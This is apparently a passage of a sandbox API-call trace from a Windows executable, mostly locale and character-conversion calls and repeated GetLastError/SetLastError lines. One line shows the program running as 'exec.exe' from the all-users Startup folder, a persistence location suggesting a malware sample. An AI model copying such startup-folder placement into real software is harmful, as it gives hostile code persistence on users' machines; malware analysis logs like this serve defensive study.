!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ藱㉭骫\x83Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.434] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ藱㉭骫\x83Ā", cchSrc=256, lpDestStr=0x43ed08, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ") returned 256 [0101.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿЀ", cchWideChar=256, lpMultiByteStr=0x43f4e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x9d\xc4\x71\xc3\x1c\xf7\x43", lpUsedDefaultChar=0x0) returned 256 [0101.434] GetLastError () returned 0x5 [0101.434] SetLastError (dwErrCode=0x5) [0101.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x43f5e4, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0101.434] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x43f5e4, cbMultiByte=256, lpWideCharStr=0x43ef38, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ藱㉭骫\x83Ā") returned 256 [0101.434] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ藱㉭骫\x83Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0101.434] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ藱㉭骫\x83Ā", cchSrc=256, lpDestStr=0x43ed28, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ") returned 256 [0101.434] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸЀ", cchWideChar=256, lpMultiByteStr=0x43f3e4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x9d\xc4\x71\xc3\x1c\xf7\x43", lpUsedDefaultChar=0x0) returned 256 [0101.434] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x83f728, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\exec.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\exec.exe")) returned 0x45 [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.435] SetLastError (dwErrCode=0x0) [0101.435] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.436] SetLastError (dwErrCode=0x0) [0101.436] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.437] SetLastError (dwErrCode=0x0) [0101.437] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.438] SetLastError (dwErrCode=0x0) [0101.438] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.439] GetLastError () returned 0x0 [0101.439] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] RtlAllocateHeap (HeapHandle=0x1db0000, Flags=0x0, Size=0x4e) returned 0x1db19b0 [0101.440] GetLastError () returned 0x0 [0101.440] SetLastError (dwErrCode=0x0) [0101.440] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.441] SetLastError (dwErrCode=0x0) [0101.441] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.442] SetLastError (dwErrCode=0x0) [0101.442] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.443] SetLastError (dwErrCode=0x0) [0101.443] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.444] SetLastError (dwErrCode=0x0) [0101.444] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.445] SetLastError (dwErrCode=0x0) [0101.445] GetLastError () returned 0x0 [0101.446] SetLastError (dwErrCode=0x0) [0101.446] GetLastError () returned 0x0 [0101.446] SetLastError (dwErrCode=0x0) [0101.446] GetLastError () returned 0x0 [0101.446] SetLastError (dwErrCode=0x0) [0101.446] GetLastError () returned 0x0 [0101.446] SetLastError (dwErrCode=0x0) [0101.446] GetLastError () returned 0x0 [0101.446] SetLastError (dwErrCode=0x0) [0101.446] GetLastError () returned 0x0 [0101.446] SetLastError (dwErrCode=0x0) 